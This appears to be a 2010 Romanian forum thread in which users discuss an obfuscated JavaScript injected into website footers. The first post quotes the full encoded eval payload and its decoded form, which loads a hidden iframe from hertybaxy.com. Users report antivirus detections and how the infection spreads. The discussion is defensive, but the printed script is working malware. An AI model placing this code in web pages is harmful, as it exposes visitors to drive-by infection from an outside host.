paxnWo Posted April 21, 2010 Report Share Posted April 21, 2010 azi am dat peste al 6-lea site pe saptamana asta care are inserat in footer: <script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%75%45%75%2C%78%55%6F%2C%45%4E%62%56%2C%61%4C%2C%71%6D%2C%49%4A%29%7B%71%6D%3D%53%74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%45%4E%62%56%2D%2D%29%49%4A%5B%45%4E%62%56%5D%3D%61%4C%5B%45%4E%62%56%5D%7C%7C%45%4E%62%56%3B%61%4C%3D%5B%66%75%6E%63%74%69%6F%6E%28%71%6D%29%7B%72%65%74%75%72%6E%20%49%4A%5B%71%6D%5D%7D%5D%3B%71%6D%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%45%4E%62%56%3D%31%7D%3B%77%68%69%6C%65%28%45%4E%62%56%2D%2D%29%69%66%28%61%4C%5B%45%4E%62%56%5D%29%75%45%75%3D%75%45%75%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%71%6D%28%45%4E%62%56%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%61%4C%5B%45%4E%62%56%5D%29%3B%72%65%74%75%72%6E%20%75%45%75%7D%28%27%35%2E%32%28%22%3C%38%20%37%3D%5C%5C%22%36%3A%2F%2F%34%2E%30%2F%5C%5C%22%20%33%3D%31%20%39%3D%31%3E%22%29%3B%27%2C%31%30%2C%31%30%2C%27%63%6F%6D%7C%7C%77%72%69%74%65%7C%77%69%64%74%68%7C%68%65%72%74%79%62%61%78%79%7C%64%6F%63%75%6D%65%6E%74%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%68%65%69%67%68%74%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29'));</script><!-- uy7gdr5kmn -->site-urile nu au nicio legatura intre ele, doar ca sunt din ro. toate au commentul " uy7gdr5kmn ". hexul de mai sus decriptat: eval(function(uEu,xUo,ENbV,aL,qm,IJ){qm=String;if(!''.replace(/^/,String)){while(ENbV--)IJ[ENbV]=aL[ENbV]||ENbV;aL=[function(qm){return IJ[qm]}];qm=function(){return'\\w+'};ENbV=1};while(ENbV--)if(aL[ENbV])uEu=uEu.replace(new RegExp('\\b'+qm(ENbV)+'\\b','g'),aL[ENbV]);return uEu}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'com||write|width|hertybaxy|document|http|src|iframe|height'.split('|'),0,{}))iframe catre hertybaxy.compana si un html de-al meu a fost infectat cu asta, era singurul de pe host, nu se pune problema ca ar fi luat cineva acces la el. dubios. oricum, autorii scot o gramada de bani. Quote Link to comment Share on other sites More sharing options...
linux_terminal Posted April 21, 2010 Report Share Posted April 21, 2010 (edited) E interesant pentru ca si eu mam gandit la unu asemanator, e bine ca e inofensiv:)Kaspersky mi la gasit ca find:: Trojan-Clicker.JS.Iframe.fcSi fara antivirus:: Windows 7C:\WINDOWS\system32\SEARCHPROTOCOLHOST.EXE Edited April 22, 2010 by linux_terminal Quote Link to comment Share on other sites More sharing options...
Fitty Posted April 22, 2010 Report Share Posted April 22, 2010 Si mie mi s-a intamplat, pe mai multe hosturi. Dar macar eu nu ma alarmez si ma pis pe ele.@linux_terminal: Windows user? )) Quote Link to comment Share on other sites More sharing options...
loki Posted April 22, 2010 Report Share Posted April 22, 2010 astea iti infecteaza toate fisierele html php pe care le gaseste. Tre sa scanezi tot pe acolo. Am patit-o acasa candva si mai tarziu pe awardspace da acolo nu m-am prins pe unde a intrat, nu aveam nimic care sa permita scrieri. Quote Link to comment Share on other sites More sharing options...